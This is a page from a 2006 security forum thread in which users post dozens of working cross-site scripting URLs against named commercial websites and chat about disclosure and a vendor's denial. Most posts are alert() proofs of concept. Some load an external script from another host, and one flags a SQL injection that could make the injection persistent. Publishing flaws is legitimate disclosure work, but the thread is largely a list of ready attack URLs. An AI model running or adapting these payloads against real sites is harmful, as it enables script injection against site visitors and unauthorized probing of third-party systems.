Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 65
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:24AM

he's right that it does digital.. the same for jeep.com

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript+src=http://ha.ckers.org/s.js%3E%3C/script%3E&areacode=&phone=&phoneExt=&region=&howtocontact=phone&action=Submit (f5.com - previously disclosed) is an example of one thats POST only, ghozt

-maluc



Edited 1 time(s). Last edit at 09/28/2006 01:24AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:32AM

please note: these have all already been disclosed .. but can be linked via GET as well as POST, so i'm reposting without going through whiteacid's script.

http://www.gm.com/Scripts/SearchServer.exe?query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit disclosed by digi7al64
http://www.anywho.com/qry/wp_fap?lastname=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit disclosed by digi7al64
http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi?chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E disclosed by Kyran
http://news.com.com/2113-1038_3-6119515.html?toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E disclosed by Kyran
https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp?email=xss'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cb%20 disclosed by me ^^
http://www.travelodge.com/Travelodge/control/find_by_map_name2?LOCATION_LEVEL=country&LOCATION_CODE=null disclosed by digi7al64
http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field disclosed by WhiteAcid
http://userfriendly.org/cgi-bin/survey.cgi?personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E disclosed by WhiteAcid

There were 9.5 other ones that geniunely require it to be POST .. 9 are still active, that .5 is fixed either way, so can't tell.

-maluc



Edited 3 time(s). Last edit at 09/28/2006 01:44AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:36AM

http://www.us-webmasters.com/Decode-URLs/
http://www.netdemon.net/decode.html
%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

By the way, I'm pretty new to XSS, so this is probably the best place to ask. If I can bypass the < and > filters on a site with &lt; and &gt; and have it show as <script> and </script> then is there any way to make it execute the script instead of just displaying it?



Edited 1 time(s). Last edit at 09/28/2006 01:38AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:51AM

Please try to post the full link when disclosing .. it's not a requirement (there are no requirements/rules to disclosing here) but it makes it easier for my lazy self. whiteacid's script for POSTs is very handy

And no, if it shows up as &lt; in the source.. it's not going to render in the browser. However, rarely - and i stress rarely - you may find a site that converts the &lt back into a < and displays it .. i can only recall it once before, and i didn't pay attention to what language it was written in. :/

But almost always, no.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:56AM

http://profiles.yahoo.com/ghozt64
I was pretty sure it wouldn't, but I thought it was a good idea to ask.



Edited 1 time(s). Last edit at 09/28/2006 01:57AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:10AM

http://webcenters.netscape.compuserve.com/celebrity/results.jsp?floc=ce-main-2-l1&q=a--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&searchType=photosearch&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:18AM

http://search.lexmark.com/searchresults.shtml?query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=44&y=16
http://www.nvidia.com/page/search.html?page=1&keywords=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&booleanMode=1
http://search.ati.com/nasearch.asp?Query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&go.x=14&go.y=15&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New
http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&qxt=home&display=&dclksa=1



Edited 3 time(s). Last edit at 09/28/2006 02:24AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:28AM

ask away, it's exactly what this forum is for..

http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= <a> tag breakout
http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= <!-- --> tag breakout

it's also very clearly susceptible to SQL injection (and kind enough to list it's query string) .. which would probably allow you to add Hooter events to the database with html tags .. thus persistent.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:32AM

the buy.com doesn't appear to work, although if you look in the source there are two places for injection inside javascript. They're the same kinda injection so one input will execute both..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:35AM

Buy.com works in firefox. Not sure how to put geeksquad in a URL, so "><script>alert('XSS')</script> goes in Mailing list. http://www.geeksquad.com/email/HighLevel.php

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:38AM

http://www.pricegrabber.com/search_attrib.php?form_keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&topcat_id=&page_id=5&lo_p=0&hi_p=0
http://www.xfxforce.com/web/search.jspa?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchIn=gamersCentral&searchIn=support&searchIn=product&searchIn=news&searchIn=feature
http://www.bizrate.com/search__SEARCH_GO--Find%20it!__cat_id--1__keyword--%22%3Balert('xss')%3Bvar%20str%3D%22__search_box--1__sfsk--0.html
http://castle.pricewatch.com/s/search.asp?s=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
http://www.cyberguys.com/templates/searchall.asp?search=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E



Edited 5 time(s). Last edit at 09/28/2006 02:56AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 02:54AM

http://www.gotdotnet.com/GDNSearch.aspx?query=<script>alert('xss')</script>&Sites=(www.GotDotNet.com)

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:06AM

http://www.sonystyle.com/is-bin/INTERSHOP.enfinity/eTS/Store/en/-/USD/SY_Email_Subscription-Create?source=LC&mailpref=Y&email=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%40yahoo.com
http://www.alliedelec.com/Search/SearchResults.asp?N=0&page=no_results&Ntt=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&sid=451B10801174E17F&i=
http://www.mouser.com/search/Refine.aspx?Ne=1447464+254016&Ntt=*%3e%3cscript%3ealertXSS%3cscript%3e*&Ntx=mode%2bmatchall&Mkw=%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3e&N=1323038&Ntk=Mouser_Wildcards
http://www.newark.com/NewarkWebCommerce/newark/en_US/endecaSearch/searchPage2.jsp;jsessionid=2KVVR5G302HOOCXDUY2SFFYK2OTCIIV1?Ntt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchtype=mfg&Nty=1&N=0&Ntk=gensearch
http://www.jameco.com/webapp/wcs/stores/servlet/CatalogSearchResultView?langId=-1&storeId=10001&catalogId=10001&searchValue=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchType=m



Edited 4 time(s). Last edit at 09/28/2006 03:16AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 03:17AM

Well i'm off to sleep now.. but the buy.com doesn't seem to work in firefox/opera/ie7 as it is - what version of ff are you running?

i do however get it to execute after first breaking out of the <!-- --> like in:
--><script>alert(1)</script>

cleaned up: http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%2D%2D%3E%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cscript%3E%3C%21%2D%2D&qxt=home&display=&dclksa=1

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:19AM

I'm running 1.5.0.7 linux.
G'nite.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:21AM

http://cars.kbb.com/go/search/advanced_search.jsp?error=ERR_INV_ZC&tracktype=usedcc&searchType=22&yearType=popular&cid=&dlid=&dgid=&amid=&cname=&zc=%26amp%3Bamp%3B&makeid=1&modelid=&pageNumber=0&numResultsPerPage=50&largeNumResultsPerPage=0&sortorder=descending&sortfield=PRICE+descending&certifiedOnly=false&criteria=&aff=carskbb&aff=carskbb

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 03:21AM

heh, you're on a roll~ .. and i'm sad to see so many hardware component vendors, although i'm not surprised.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:29AM

http://www.engadget.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E :D
http://www.lww.com/search/advancedsearch/?rowStart=1&title=&author=&ISBN=&keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&exactTerm=1&allFields=1&yearFrom=&yearThru=&productTypes=&mediaTypes=&source=qs&action=search
http://search.gifts.com/?q=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=26&y=6
http://www.linuxdevices.com/cgi-bin/search_view.cgi?snews=checked&sarticle=checked&sk=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&st=all&view=Search&ss=newest
http://www.gamerankings.com/itemrankings/Itemsearch.asp?Itemname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&extsearch=0
Something funny I found: http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3Asearch+site%3Adigg.com+intitle%3Asearch+inurl%3Asearch&btnG=Search Look at the second listing.
http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=54&y=9
http://www.travelport.com/en/search/index.cfm?qt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E



Edited 8 time(s). Last edit at 09/28/2006 04:26AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 10:10AM

Well i'm glad to see Acunetix is addressing the issue now.. and hopefully doesn't deny it later as a 'planned' software upgrade.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 28, 2006 11:27AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.whalecommunications.com/site/whale/corporate/Whale.asp?pi=24&topSearchText=whale%22%3E%3Cscript%3Ealert('XSS+with+Secure+Remote+Access+from+Anywhere')%3C/script%3E

POST only, but nice example where to dig deeper.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 11:50AM

hrm, i get an SQL error when trying.. it works when changing the single quotes to double quotes though
(except after getting the error in firefox, i can't change the request in firefox to anything else, persistant error page)

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 28, 2006 12:18PM

works perfect for me in FF, the SQL error is a/the goody;-)

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 28, 2006 12:44PM

someone willing to setup a list with: url, date of disclosure, days 'til fix ?
That would give the blamed sites a chance for getting back their reputation, somehow , or being on top of the wall of shame when sorted with last column.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 28, 2006 12:50PM

If we are to do that, we need a formal disclosure form we can agree on. And someone to keep track of it all.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 12:55PM

How about we take this to another thread? This one is long enough. I'll start one in projects.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 28, 2006 01:00PM

Yeah. For discussion of disclosure, etc.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:12PM

maybe if i get bored one afternoon, i'll slap together a script for it .. and put it up on this box - but i dont have a reliable host to put it on that supports databases. So if it ever gets slashdotted or becomes popular.. expect a nice long DDoS ^^

in other news: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://portal.knowledgebase.net/display/4n/login.asp&aid=&t=&searchstring=&search=&cat=&catURL=&cpid=10213&username=XSS%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&password=&rememberme=on <--netcontinuums support login, on knowledgebase.net

i'm not sure if this is indicative of a problem on all knowledgebases or just theirs.. anyone care to investigate?

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 01:17PM

A highly amusing image considering what this company says about the flaws we found on its site:


I'm writing a post on http://blogs.securiteam.com just to explain the issue in more detail to people in other circles.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:38PM

I'm not one for company bashing, but they did irk me when they denied it. Especially when its their field of work, and their flagship product is a gangly tool thats supposed to scan for such things.. but oh well, they're putting their own foot in their mouth with the PR girl they have. (8 uses of forms of the word 'they')

On the bright side, they fixed the issues much faster than most companies.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 01:42PM

http://blogs.securiteam.com/index.php/archives/649 < a rant I made about the whole Acunitex issue.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 65


Sorry, only registered users may post in this forum.